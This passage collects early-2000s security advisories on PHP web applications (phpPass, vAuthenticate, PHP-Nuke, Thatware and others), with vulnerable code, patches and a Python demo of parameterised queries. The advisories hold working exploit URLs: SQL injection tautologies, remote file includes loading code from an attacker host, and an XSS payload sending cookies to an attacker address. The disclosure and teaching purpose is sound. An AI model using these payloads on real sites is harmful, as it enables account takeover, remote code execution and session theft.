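        with open(dest) as f:
            results["vuln_leak"] = "constructed-secret" in f.read()

        try:
            save_item_safe(exploit_photo, "ttxt", imgroot, tmp)
            results["safe_conf"] = "accepted"
        except UploadError:
            results["safe_conf"] = "refused"

        upload = os.path.join(tmp, "phpUpl0ad")            # a real PNG stub
        with open(upload, "wb") as f:
            f.write(b"\x89PNG\r\n\x1a\n" + bytes(16))
        results["safe_png"] = save_item_safe(upload, "image/png", imgroot, tmp).endswith(".png")
        results["jpeg_ext"] = image_name_vulnerable("image/pjpeg", now)
    return results
```

The date-stamped name is the second half of the exploit: once conf.php has
been copied, the search URL in the post finds the record and hence the file
name, so the hardened version also drops the predictable name.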



phpPass (PHP)

2003-01-20 Thread Frog Man

Informations :
°°
Version : 2
Website : http://www.agames-net.com
Problem : SQL Injection

PHP Code/Location :
°°°
accesscontrol.php :

[...]
session_register("uid");
session_register("pwd");
[...]
$sql = "SELECT * FROM user WHERE
   userid = '$uid' AND password = '$pwd'";
$result = mysql_query($sql);
[...]
if (mysql_num_rows($result) == 0) {
 session_unregister("uid");
 session_unregister("pwd");
 ?>
 <html>
 <head>
 <title> Access Denied </title>
[...]
 exit;
[...]



Exploit :
°
http://[target]/protectedpage.php?uid='%20OR%20''='&pwd='%20OR%20''='


Patch :
°°°
In accesscontrol.php, replace the lines :
-
$sql = "SELECT * FROM user WHERE
   userid = '$uid' AND password = '$pwd'";
$result = mysql_query($sql);


by :

$uid=addslashes($uid);
$pwd=addslashes($pwd);
$sql = "SELECT * FROM user WHERE userid = '$uid' AND password = '$pwd'";
$result = mysql_query($sql);


A patch can be found on http://www.phpsecure.org .


More details :
°°
In French :
http://www.frog-man.org/tutos/phpPass.txt
translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FphpPass.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools


frog-m@n



_



vSignup, vAuthenticate (PHP)

2003-01-20 Thread Frog Man

Informations :
°°
---
Product : vAuthenticate
Version : 2.8
---
Product : vSignup
Version : 2.1
---
Website : http://www.beanbug.net
Problem : SQL Injection


PHP Code/Location :
°°°
chgpwd.php :
---
<?
	if (!class_exists("auth"))
	{
		include ("auth.php");
	}
		include ("authconfig.php");
		include ("check.php");
?>
---

admin/index.php :
--
<?
	if (!class_exists("auth"))
	{
		include ("../auth.php");
	}
		include ("../authconfig.php");
		include ("../check.php");

	if ($check[level] != 1)
	{
--


check.php :

<?
	$CheckSecurity = new auth();
	$check = $CheckSecurity->page_check($USERNAME, $PASSWORD);
	if ($check == false)
	{
		// Feel free to change the error message below. Just make sure you put a
		// \ before any double quote.
		print "<font face=\"Arial, Helvetica, sans-serif\" size=\"5\" color=\"#FF\">";
		print "<b>Illegal Access</b>";
		print "</font><br>";
 		print "<font face=\"Verdana, Arial, Helvetica, sans-serif\" size=\"2\" color=\"#00\">";
		print "<b>You do not have permission to view this page.</b></font>";

		exit; // End program execution. This will disable continuation of
		      // processing the rest of the page.
	}

?>




auth.php :

function page_check($username, $password) {
	$query = "SELECT * FROM authuser WHERE uname='$username' AND passwd='$password' AND status <> 'inactive'";
	$connection = mysql_connect($this->HOST, $this->USERNAME, $this->PASSWORD);

	// OLD CODE - DO NOT REMOVE
	// $result = mysql_db_query($this->DBNAME, $query);

	// REVISED CODE
	$SelectedDB = mysql_select_db($this->DBNAME);
	$result = mysql_query($query);

	$numrows = mysql_num_rows($result);
	$row = mysql_fetch_array($result);

	// CHECK IF THERE ARE RESULTS
	// Logic: If the number of rows of the resulting recordset is 0, that means that no
	// match was found. Meaning, wrong username-password combination.
	if ($numrows == 0) {
		return false;
	}
	else {
		return $row;
	}
} // End: function page_check





Exploits :
°°
http://[target]/chgpwd.php?USERNAME=[username]&PASSWORD='%20OR%20''='

http://[target]/admin/index.php?USERNAME='%20OR%20''='&PASSWORD='%20OR%201=1%20AND%20level='1



Patches :

A patch can be found on http://www.phpsecure.org.



More details :
°°
In French :
http://www.frog-man.org/tutos/vAuth-Signup.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FvAuth-Signup.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools


frog-m@n


_
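Added example, not code from PHP-Nuke, phpMyShop, phpPass or vAuthenticate:
the WHERE user='$u' AND pass='$p' login query those posts share, modelled in
Python against an in-memory SQLite table, with the two exploit shapes above
(' OR ''=' in the password field, as in the phpPass and phpMyShop URLs, and
' OR 1=1 AND level='1 to pick the admin row, as in the vAuthenticate URL)
run first against the spliced query and then against the same query with
bound parameters. The table, columns and accounts are constructed for the
example.

```python
"""Login query built by string splicing beside the parameterised form.

Added example (Python, standard-library sqlite3), not code from PHP-Nuke,
phpMyShop, phpPass or vAuthenticate.  Table, column and account names are
this example's own.
"""
import sqlite3

# Constructed accounts.  Passwords are compared as submitted, as
# vAuthenticate's page_check() does; hashing them is a separate fix and does
# not remove the injection, which works through either column.
USERS = [("admin", "s3cret", 1), ("bob", "bobpass", 0)]


def make_db() -> sqlite3.Connection:
    """In-memory table shaped like vAuthenticate's authuser."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE authuser (uname TEXT, passwd TEXT, level INTEGER)")
    db.executemany("INSERT INTO authuser VALUES (?, ?, ?)", USERS)
    return db


def login_vulnerable(db: sqlite3.Connection, username: str, password: str):
    """The vulnerable shape: the submitted strings become part of the SQL text.

    A password of   ' OR ''='   closes the literal and appends a tautology, so
    the first row in the table (here the admin) comes back without a credential.
    """
    sql = ("SELECT uname, level FROM authuser WHERE uname='%s' AND passwd='%s'"
           % (username, password))
    return db.execute(sql).fetchone()


def login_safe(db: sqlite3.Connection, username: str, password: str):
    """Same query with bound parameters: the values travel separately from the
    statement, so quotes inside them are data, never syntax."""
    sql = "SELECT uname, level FROM authuser WHERE uname=? AND passwd=?"
    return db.execute(sql, (username, password)).fetchone()


def demo() -> dict:
    """Run the two exploit shapes from the posts against both versions."""
    db = make_db()
    # phpPass / phpMyShop shape: tautology in the password field.
    taut = "' OR ''='"
    # vAuthenticate admin shape: select the row by privilege level instead.
    admin_user, admin_pass = "' OR ''='", "' OR 1=1 AND level='1"
    return {
        "vuln_tautology": login_vulnerable(db, "admin", taut),
        "vuln_level": login_vulnerable(db, admin_user, admin_pass),
        "safe_tautology": login_safe(db, "admin", taut),
        "safe_level": login_safe(db, admin_user, admin_pass),
        "safe_real": login_safe(db, "bob", "bobpass"),
    }
```

Two caveats worth keeping in mind. The INTO OUTFILE variant in the PHP-Nuke
post is MySQL-specific (it writes a file on the database host and needs the
FILE privilege); SQLite has no equivalent, but it rides on exactly the same
splice. And the addslashes() patch given for phpPass only works where the
server treats a backslash as a quote escape, which MySQL does by default and
SQLite does not (there a quote is escaped by doubling it); bound parameters
remove that dependency on the dialect.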



E-theni (PHP)

2003-01-15 Thread Frog Man


Informations :
°°
Version : ?
Website : http://www.theni.freesurf.fr
Problems :
- Include file
- phpinfo()


PHP Code/Location :
°°°
/admin_t/include/aff_liste_langue.php :
-
require ($rep_include."para_langue.php");
-


/admin_t/include/find_theni_home.php :
--
<html>
<body>
<?
phpinfo();
?>
</body></html>
--


Exploits :
°°
- 
http://[target]/admin_t/include/aff_liste_langue.php?rep_include=http://[attacker]/ 
with :
http://[attacker]/para_langue.php

(This will work only if register_globals=ON)

- http://[target]/admin_t/include/find_theni_home.php


Patches :

In admin_t/include/aff_liste_langue.php, replace the line :
-
require ($rep_include."para_langue.php");
-
by :
-
if (file_exists($rep_include."para_langue.php")){
require ($rep_include."para_langue.php");
}
-



Replace the file /admin_t/include/find_theni_home.php with :
--
<?
session_start();
if (session_is_registered("USER")==FALSE or $USER["id_user"]<1){
exit;
} else {
echo "<html>";
echo "<body>";
phpinfo();
echo "</body></html>";
}
?>
--

A patch can be found on http://www.phpsecure.org.


More details :
°°
In French :
http://www.frog-man.org/tutos/E-theni.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FE-theni.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools


frog-m@n


_



OpenTopic security hole

2003-01-04 Thread Frog Man
Informations :
°°
Product : OpenTopic
Website : http://www.infopop.com
Version : 2.3.1
Problem : XSS (script injection) - Cookies recovery


Location/Exploit :
°°
The XSS hole is in the private messages area ( 
http://[target]/OpenTopic?a=ugtpc ).
XSS to get cookie :
[IMG]http://[website]/img.gifwidth=750height=750onmouseover=a=document['coo'+'kie'];location='http://[attacker]/?'+a;[/IMG]


More details about XSS :

In French :
http://www.phpsecure.org/article/XSS.php
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.phpsecure.org%2Farticle%2FXSS.phplangpair=fr%7Cenhl=enie=ASCIIoe=ASCII


frog-m@n






N/X (PHP)

2003-01-02 Thread Frog Man
Information :
°°
Website : http://nxwcms.sourceforge.net/
Version : 2002 PreRelease 1
Problem : Include file

PHP Code/Location :
°°°
nx/common/cds/menu.inc.php :
---
[...]
	require_once $c_path."common/lib/launch.inc.php";
[...]
---

nx/common/dbo/datasets.php :
---
<?
	require_once $c_path."common/dbo/saveset.php";
	require_once $c_path."common/dbo/recordset.php";
	require_once $c_path."common/dbo/deleteset.php";
	require_once $c_path."common/dbo/updateset.php";
	require_once $c_path."common/dbo/insertset.php";
[...]
---

nx/common/lib/mass_opeations.inc.php :
---
<?
 require_once $c_path."common/lib/launch.inc.php";
 require_once $c_path."common/cds/menu.inc.php";
[...]
---

etc...

Exploits :
°°

http://[target]/nx/common/cds/menu.inc.php?c_path=http://[attacker]/ with :
http://[attacker]/common/lib/launch.inc.php


http://[target]/nx/common/dbo/datasets.php?c_path=http://[attacker]/ with :
http://[attacker]/common/dbo/saveset.php
http://[attacker]/common/dbo/recordset.php
http://[attacker]/common/dbo/deleteset.php
http://[attacker]/common/dbo/updateset.php
http://[attacker]/common/dbo/insertset.php


etc...

Solution :
°°
Add this line in bugged files :
-
if (!file_exists($c_path."index.php")){ die("Path not found."); }
-

A patch can be found on http://www.phpsecure.org .

More details :
°°
In French :
http://www.frog-man.org/tutos/NX.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FNX.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools


frog-m@n





PEEL (PHP)

2002-12-31 Thread Frog Man


Information :
°°
Version : 1.0b
Website : http://www.mapetite-entreprise.com
Problem : Include file

PHP Code/Location :
°°°
modeles/haut.php :
---
<?
$langfile = $dirroot."/lang/".$SESSION["lang"]."/lang.php";
require ($langfile);
?>
[...]
---

Exploit :
°
http://[target]/modeles/haut.php?dirroot=http://[attacker]SESSION=.
with :
http://[attacker]/lang/lang.php

Patch :
°°°
In modeles/haut.php replace the lines :
---
<?
$langfile = $dirroot."/lang/".$SESSION["lang"]."/lang.php";
require ($langfile);
?>
---
by :
---
<?
$langfile = $dirroot."/lang/".$SESSION["lang"]."/lang.php";
if (file_exists($langfile)){
require ($langfile);
}
?>
---

A patch can be found on http://www.phpsecure.org


More details :
°°
In French :
http://www.frog-man.org/tutos/PEEL.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FPEEL.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools


frog-m@n





SPGpartenaires (PHP)

2002-12-20 Thread Frog Man


Information :
°°
Version : ? - 3.0.1
Website : http://www.scripts-php-gratuits.com
Problem : SQL Injection - Access to member's accounts

PHP Code/Location :
°°°
modif/ident.php :
--
[...]
$sql="SELECT nomsite FROM SPGPartenaires WHERE id='".$id."' AND 
motdepasse='".$pass."'";
$re=@mysql_db_query($db_name,$sql,$connect);
$result=@mysql_fetch_array($re);
if(empty($result[0]))
{
header("location: index.php?msg=Identification+incorrecte+!");
}
else
{
setcookie("SPGP",$id."||".$pass,time()+84600,"");
header("location: index2.php");
}
[...]
--


modif/delete.php, modif/index2.php, modif/modif.php, modif/modif_suite.php :
--
<?
if(!isset($SPGP))
{
header("location: index.php?msg=Veuillez+vous+identifier+!");
}
else
{
$inf=explode("||",$SPGP);
[...]
$sql="SELECT id FROM SPGPartenaires WHERE id='".$inf[0]."' AND 
motdepasse='".$inf[1]."'";
$re=@mysql_db_query($db_name,$sql,$connect);
$result=@mysql_fetch_array($re);
if(empty($result[0]))
{
header("location: index.php?msg=Veuillez+vous+identifier+!");
}
[...]
--


Exploits :
°°
http://[target]/modif/ident.php?id=[MEMBERID]pass='%20OR%20''='
or QUERY :
?SPGP=[ID]%7C%7C'%20OR%20''='
with :
- modif/delete.php
- modif/index2.php
- modif/modif.php
- modif/modif_suite.php


Patch :
°°°
In modif/ident.php replace the line :

$sql="SELECT nomsite FROM SPGPartenaires WHERE id='".$id."' AND 
motdepasse='".$pass."'";

by :
---
$sql="SELECT nomsite FROM SPGPartenaires WHERE id='".addslashes($id)."' AND 
motdepasse='".addslashes($pass)."'";
---

And in the other files replace the line :
---
$sql="SELECT id FROM SPGPartenaires WHERE id='".$inf[0]."' AND 
motdepasse='".$inf[1]."'";
---
by :
---
$sql="SELECT id FROM SPGPartenaires WHERE id='".addslashes($inf[0])."' AND 
motdepasse='".addslashes($inf[1])."'";
---

A patch can be found on http://www.phpsecure.org.

More details :
°°
In French :
http://www.frog-man.org/tutos/SPGpartenaires.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FSPGpartenaires.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools


frog-m@n







WAnewsletter (PHP)

2002-12-19 Thread Frog Man


Information :
°°
Website : http://www.phpcodeur.net
Versions : 2.0beta - 2.1.0
Problem : Include file


PHP Code/Location :
°°°
newsletter.php 2.1beta - 2.1.0 :

if( !empty($HTTP_POST_VARS['action']) )
{
	$action = $HTTP_POST_VARS['action'];
}
else if( !empty($HTTP_GET_VARS['action']) )
{
	$action = $HTTP_GET_VARS['action'];
}
else
{
	$action = '';
}

if( $action != '' || defined('IN_WA_FORM') )
{
	$login = false;
	include_once($waroot . 'start.php');
}
[...]


sql/db_type.php 2.0.2 - 2.1.0 :

switch($dbtype)
{
	case 'mysql':
		include_once($waroot . 'sql/mysql/mysql.inc.php');
		break;

	case 'mssql':
		include_once($waroot . 'sql/mssql/mssql.inc.php');
		break;

	default:
		echo '<b>Le type de base de données n\'est pas défini !</b>';
		exit;
		break;
}
[...]



etc...

Exploits :
°°
http://[target]/newsletter.php?action=1waroot=http://[attacker]/
http://[target]/sql/db_type.php?waroot=http://[attacker]/

Patch :
°°°
A patch can be found on http://www.phpsecure.org .

More details :
°°
In French :
http://www.frog-man.org/tutos/WAnewsletter.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FWAnewsletter.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools


frog-m@n






PHP-Nuke 6.0 : Path Disclosure Cross Site Scripting

2002-12-16 Thread Frog Man
Information :
°°
Product : PHP-Nuke
Version : 6.0
Website : http://www.phpnuke.org
Problems :
- Path Disclosure
- XSS


Development :
°°°
The majority of PHPNuke's files are included in modules.php or 
index.php.  To prevent direct access, PHPNuke made two kinds of safety check.
The first one (e.g. in modules/Downloads/index.php) is :
---
if (!eregi("modules.php", $PHP_SELF)) {
   die ("You can't access this file directly...");
}
---

The second one (e.g. footer.php ) :

if (eregi("footer.php",$PHP_SELF)) {
   Header("Location: index.php");
   die();
}


Some files don't have these safety measures, and they have security holes.

Exploits :
°°
Path Disclosure :
http://[target]/modules/Downloads/voteinclude.php
http://[target]/modules/Your_Account/navbar.php
http://[target]/modules/Forums/attachment.php
http://[target]/modules/Forums/auth.php
http://[target]/modules/News/comments.php
http://[target]/modules/Private_Messages/functions.php
http://[target]/modules/Private_Messages/index.php
http://[target]/modules/Private_Messages/read.php
http://[target]/modules/Private_Messages/reply.php
http://[target]/modules/Web_Links/voteinclude.php
http://[target]/modules/WebMail/contactbook.php?user=1

Path Disclosure & Cross Site Scripting :
- http://[target]/modules/Forums/bb_smilies.php?name=[SCRIPT]
or http://[target]/modules/Forums/bb_smilies.php?Default_Theme=[SCRIPT]
or 
http://[target]/modules/Forums/bb_smilies.php?site_font=}--/style[SCRIPT]
or http://[target]/modules/Forums/bb_smilies.php?bgcolor1=;[SCRIPT]
or with :
$sitename
$table_width
$color1
$forumver

- /modules/Forums/bbcode_ref.php with :
$name
$Default_Theme
$site_font
$sitename
$bgcolor2
$textcolor1
$bgcolor1
$forumver

- /modules/Forums/editpost.php, /modules/Forums/newtopic.php, 
/modules/Forums/reply.php, /modules/Forums/topicadmin.php, 
/modules/Forums/viewforum.php with :
$name

- /modules/Forums/searchbb.php with :
$name
$bgcolor3
$bgcolor1


Patch :
°°°
A patch can be found on http://www.phpsecure.org .


More details :
°°
In French :
http://www.frog-man.org/tutos/PHPNuke6.0.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FPHPNuke6.0.txtlangpair=fr%7Cenhl=enie=ASCIIoe=ASCII

frog-m@n






Security Patches for PHP Products

2002-12-16 Thread Frog Man
PHPSecure made some patches for security holes in PHP products.
Here is the list :


- ALP - Banner Ad 2.0 :
http://www.phpsecure.org/index.php?id=1zone=pDl
More details :
http://online.securityfocus.com/search?category=22query=ALP

- Tight Auction 3.0 :
http://www.phpsecure.org/index.php?id=6zone=pDl
More details :
http://online.securityfocus.com/search?category=22query=TightAuction

- PY-Membres 3.1 :
http://www.phpsecure.org/index.php?id=9zone=pDl
More details :
http://online.securityfocus.com/search?category=22query=PY-Membres

- dobermann FORUM 0.5 :
http://www.phpsecure.org/index.php?id=8zone=pDl
More details :
http://online.securityfocus.com/search?category=22query=dobermann FORUM

- phpnewsDev 1 :
http://www.phpsecure.org/index.php?id=10zone=pDl
More details :
http://online.securityfocus.com/search?category=22query=phpnewsDev

- KillerProtection 1 :
http://www.phpsecure.org/index.php?id=11zone=pDl
More details :
http://online.securityfocus.com/search?category=22query=KillerProtection

- phpSecurePages 0.27b :
http://www.phpsecure.org/index.php?id=12zone=pDl
More details :
http://online.securityfocus.com/search?category=22query=phpSecurePages

- Avotravis 2.1 :
http://www.phpsecure.org/index.php?id=13zone=pDl
More details :
http://online.securityfocus.com/search?category=22query=Avotravis

- PunxNews 2.1 :
http://www.phpsecure.org/index.php?id=14zone=pDl
More details :
http://online.securityfocus.com/search?category=22query=PunxNews

- phpforge 2.3 :
http://www.phpsecure.org/index.php?id=15zone=pDl
More details :
http://online.securityfocus.com/search?category=22query=phpforge

- phpforge 3b2 :
http://www.phpsecure.org/index.php?id=60zone=pDl
More details :
http://online.securityfocus.com/search?category=22query=phpforge

- Inertianews 0.02 beta :
http://www.phpsecure.org/index.php?id=17zone=pDl
More details :
http://online.securityfocus.com/search?category=22query=Inertianews

- MySimpleNews 1 :
http://www.phpsecure.org/index.php?id=16zone=pDl
More details :
http://online.securityfocus.com/search?category=22query=MySimpleNews

- Pollen 1.4.1 :
http://www.phpsecure.org/index.php?id=18zone=pDl
More details :
http://online.securityfocus.com/search?category=22query=Pollen

- Pphlogger (Power Phlogger) 2.0.9 :
http://www.phpsecure.org/index.php?id=7zone=pDl
More details :
http://online.securityfocus.com/search?category=22query=Pphlogger (Power 
Phlogger)

- News Evolution 1.0 :
http://www.phpsecure.org/index.php?id=21zone=pDl
More details :
http://online.securityfocus.com/search?category=22query=News Evolution

- News Evolution 2.0 :
http://www.phpsecure.org/index.php?id=22zone=pDl
More details :
http://online.securityfocus.com/search?category=22query=News Evolution

- LokwaBB 1.2.2 :
http://www.phpsecure.org/index.php?id=23zone=pDl
More details :
http://online.securityfocus.com/search?category=22query=LokwaBB

- Rose 4.52 :
http://www.phpsecure.org/index.php?id=24zone=pDl
More details :
http://online.securityfocus.com/search?category=22query=Rose

- WebChat for XOOPS RC3 1-5 :
http://www.phpsecure.org/index.php?id=25zone=pDl
More details :
http://online.securityfocus.com/search?category=22query=WebChat for XOOPS 
RC3

- EasyNews 4.2 , 4.3 :
http://www.phpsecure.org/index.php?id=26zone=pDl
More details :
http://online.securityfocus.com/search?category=22query=EasyNews

- Mon Album 0.6.2d :
http://www.phpsecure.org/index.php?id=27zone=pDl
More details :
http://online.securityfocus.com/search?category=22query=Mon Album

- XOOPS RC3 :
http://www.phpsecure.org/index.php?id=61zone=pDl
More details :
http://online.securityfocus.com/search?category=22query=XOOPS

- Photo Db 1.4 :
http://www.phpsecure.org/index.php?id=28zone=pDl
More details :
http://online.securityfocus.com/search?category=22query=Photo Db

- PHP Image View 1.0 :
http://www.phpsecure.org/index.php?id=29zone=pDl
More details :
http://online.securityfocus.com/search?category=22query=PHP Image View

- mcPass 1 :
http://www.phpsecure.org/index.php?id=30zone=pDl
More details :
http://online.securityfocus.com/search?category=22query=mcPass

- Pseudo-Frame 1.0 :
http://www.phpsecure.org/index.php?id=31zone=pDl
More details :
http://online.securityfocus.com/search?category=22query=Pseudo-Frame

- SimpleBBS 1.0.3 :
http://www.phpsecure.org/index.php?id=32zone=pDl
More details :
http://online.securityfocus.com/search?category=22query=SimpleBBS

- SimpleBBS 1.0.6 :
http://www.phpsecure.org/index.php?id=33zone=pDl
More details :
http://online.securityfocus.com/search?category=22query=SimpleBBS

- WSC (Web Server Creator) - Web Portal 0.1 :
http://www.phpsecure.org/index.php?id=34zone=pDl
More details :
http://online.securityfocus.com/search?category=22query=WSC (Web Server 
Creator) - Web Portal

- Immobilier 1 :
http://www.phpsecure.org/index.php?id=35zone=pDl
More details :
http://online.securityfocus.com/search?category=22query=Immobilier

- FreeNews 2.1 :
http://www.phpsecure.org/index.php?id=20zone=pDl
More details :

MyPHPLinks (PHP) : SQL Injection

2002-12-14 Thread Frog Man

Information :
°°
Website : http://www.myphpsoft.net
Version : ? - 2.1.9, 2.2.0CVS
Problem : SQL Injection - Admin access

PHP Code/Location :
°°°
admin/auth/checksession.php
---
[...]
if($idsession!=''){
$dbs = new data(0,$MyPHPLinksHote, $MyPHPLinksBase, $MyPHPLinksUser, 
$MyPHPLinksPass);
if(!$dbs->connect())
 die($dbs->error);
if(!$dbs->query("select count(*) as nb from ".$MyPHPLinksTBAuth." where 
session='".$idsession."' and timesession > now()"))
 die($dbs->error);
while($dbs->nextrecord()){
 $loginauth = $dbs->valeur("nb");
}
if ($loginauth==0){
 header("Location:$MyPHPLinksAuthPErrDef");exit;
}else{
 if(!$dbs->query("UPDATE ".$MyPHPLinksTBAuth." set 
timesession=now()+".$MyPHPLinksTLSession." where session='".$idsession."'"))
  die($dbs->error);
}
}else{
header("Location:$MyPHPLinksAuthPErrDef");exit;
}
?>
---


Exploit :
°
http://[target]/admin/index.php?idsession='%20OR%20''='


Patch :
°°°
A patch can be downloaded on 
http://www.phpsecure.org/index.php?zone=pPatch&AsAlpha=m .

More details :
°°
In French :
http://www.frog-man.org/tutos/MyPhpLinks.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FMyPhpLinks.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools


frog-m@n





Re: XSS and Path Disclosure in UPB

2002-12-10 Thread Frog Man


Everything about UPB was already written (1.1 & 1.0beta) :
http://www.frogsecure.com/tutos/UPB.txt




From: euronymous [EMAIL PROTECTED]
Reply-To: [EMAIL PROTECTED]
To: [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: XSS and Path Disclosure in UPB
Date: Sat, 7 Dec 2002 20:08:34 +0300 (MSK)

=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
topic: XSS and Path Disclosure in UPB
product: Ultimate PHP Board (UPB) final beta 1.0
vendor: http://www.webrc.ca/php/upb.php
risk: middle
date: 12/7/2k2
discovered by: euronymous /F0KP /HACKRU Team
advisory url: http://f0kp.iplus.ru/bz/009.txt
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=

description
---

1) when calling add.php, which comes with upb, it outputs some
error message that contains the following information:


Warning: Failed opening 'textdb_v2.inc.php' for inclusion
(include_path='.:/usr/local/lib/php') in
/home/samcom/public_html/public/messageboard2/add.php on line 5
attempting to edit record...

Fatal error: Call to undefined function: format_field() in
/home/samcom/public_html/public/messageboard2/add.php on line 11


as you can see, the script output contains the full physical path of the
board.

2). but if the user has deleted this file (add.php) you can view
the full path in this way:

==
http://hostname.com/phorum/viewtopic.php?id=some_shitt_id=2
==

because the `id' parameter doesn't check if the input data has been entered
correctly, it outputs the following error message:

===--=== snip =
Warning: Unable to access ./data_dir/some_shit.dat in
/home/samcom/public_html/public/messageboard2/textdb.inc.php on
line 240

..

Warning: Supplied argument is not a valid File-Handle resource
in /home/samcom/public_html/public/messageboard2/textdb.inc.php
on line 241

..
=== snip ==

where `data_dir' is the name of the directory where important
files are stored, e.g. users.dat with users' passwords (md5). the default name
of this directory is `db'.

if the user doesn't make this dir secure, then you can get the users'
passwds by reading the file users.dat (default name.. but it is
old stuff) and cracking the md5 hashes.

3) because of the above, the file viewtopic.php doesn't check at all, so you
can insert some html in the script's output:


http://hostname.com/phorum/viewtopic.php?id=
%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3Et_id=2


[it must be in a single string]

not URL-encoded string working fine also.
ps. all of these issues apply to previous versions of upb.

shouts: HACKRU Team, DWC, DHG, Spoofed Packet, all
russian security guyz!! and kate for she is kewl girl ))
fuck_off: slavomira and other dirty ppl in *.kz


im not a lame,
not yet a hacker







Thatware (PHP)

2002-12-02 Thread Frog Man

Information :
°°
Versions : ? - 0.3 - 0.5.3
Website : http://www.thatware.org
Problems :
- Include file
- SQL Injection

PHP Code/Location :
°°°
artlist.php (v0.5.2, 0.5.3) :
-
include $root_path.'thatfile.php';
-


config.php (v? - 0.3 - 0.5.3)  :
-
include $root_path."db_settings.php";
-

thatfile.php (v? - 0.3 - 0.5.2) :

if (!IsSet($thatfile)) {
include($root_path."config.php");
if (!IsSet($translation_set)) {
include $root_path."messages.".$language.".php"; } #Translation module, even for 
english needed!


auth.inc.php (v? - 0.3 - 0.5.0) :

$admintest = 0;
$mod_ok = 0;
$moderator = 0;

if(isset($user)) {
 if (!$thatfile) include("thatfile.php");
 $admin = base64_decode($user);
 $admin = explode(":", $admin);
 if (empty($admin[0]) || empty($admin[2])) exit;
 $aid = $admin[1];
 dbconnect();
 $result=mysql_query("select rights from users where uid='$admin[0]' and 
pass='$admin[2]'");
 if(!$result) {
   echo "Oh oh... select from database failed for admin check";
   exit;
 } else {
   list($auth_rights)=mysql_fetch_row($result);
   $auth_rights=explode(",",$auth_rights);
   if (!empty($auth_rights)) {
 $admintest=1;
 if (inarray($auth_rights, 4)||inarray($auth_rights, 1)) {
	$moderator=1;
  	$mod_ok=1;
 }
   }
 }
}




Exploits :
°°
v0.5.2, 0.5.3 :
http://[target]/artlist.php?root_path=http://[attacker]/
with
http://[attacker]/thatfile.php


v? - 0.3 - 0.5.3 :
http://[target]/config.php?root_path=http://[attacker]/
with
http://[attacker]/db_settings.php


v? - 0.3 - 0.5.2 :
http://[target]/thatfile.php?root_path=http://[attacker]/language=1
with
http://[attacker]/config.php
and
http://[attacker]/messages.1.php


v? - 0.3 - 0.5.0 :
http://[target]/[NeedToBeAuth].php?user=JyBPUiAnJz0nOjE6JyBPUiAnJz0n
( base64_decode(JyBPUiAnJz0nOjE6JyBPUiAnJz0n) == ' OR ''=':1:' OR ''=')



Patches :

0.5.3:
http://www.phpsecure.org/patch/dl.php?id=47
0.5.2:
http://www.phpsecure.org/patch/dl.php?id=51
0.5.0:
http://www.phpsecure.org/patch/dl.php?id=50
0.4.5:
http://www.phpsecure.org/patch/dl.php?id=52
0.4.4:
http://www.phpsecure.org/patch/dl.php?id=49
0.4.3:
http://www.phpsecure.org/patch/dl.php?id=48
0.4.2:
http://www.phpsecure.org/patch/dl.php?id=53
0.4.1:
http://www.phpsecure.org/patch/dl.php?id=54
0.4:
http://www.phpsecure.org/patch/dl.php?id=55
0.3:
http://www.phpsecure.org/patch/dl.php?id=56

More details :
°°
In French :
http://www.frog-man.org/tutos/Thatware.txt

Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FThatware.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools

frog-m@n





FreeNews News Evolution (PHP)

2002-11-27 Thread Frog Man

Information :
°°
Problem : Include files
a) ---
Product : Freenews
Version : 2.1
Website : http://www.prologin.fr
--

b) ---
Product : News Evolution
Versions : 1.0, 2.0
Website : http://www.phpevolution.net
--


PHP Code/Location :
°°°
a) freenews 2.1
aff_news.php :
-
include ("$chemin/config.php");
include ("$chemin/options.inc.php");
include ("$chemin/freenews_functions.inc.php");
-

...

b) News Evolution 1.0
aff_news.php :
-
include ("$chemin/config.php");
include ("$chemin/functions.inc.php");
include ("$chemin/options.inc.php");
-

moteur/moteur.php :
--
include ("$chemin/moteur/moteur_form.php");
include ("$chemin/moteur/moteur_tab_results.php");
--

export_news.php :
---
include ("$chemin/config.php");
include ("$chemin/functions.inc.php");
include ("$chemin/options.inc.php");
include("$chemin/exporthtm.inc.php");
---

...

c) News Evolution 2.0
backend.php :
-
include_once("$neurl/admin/modules/rss/easyRSS.inc.php");
-

screen.php :
-
include_once("$neurl/admin/cfg/configsql.inc.php");
include_once("$neurl/admin/cfg/configscreen.inc.php");
include_once("$neurl/admin/cfg/configsite.inc.php");
include_once("$neurl/admin/cfg/configtache.inc.php");
include_once("$neurl/admin/$sitelang");
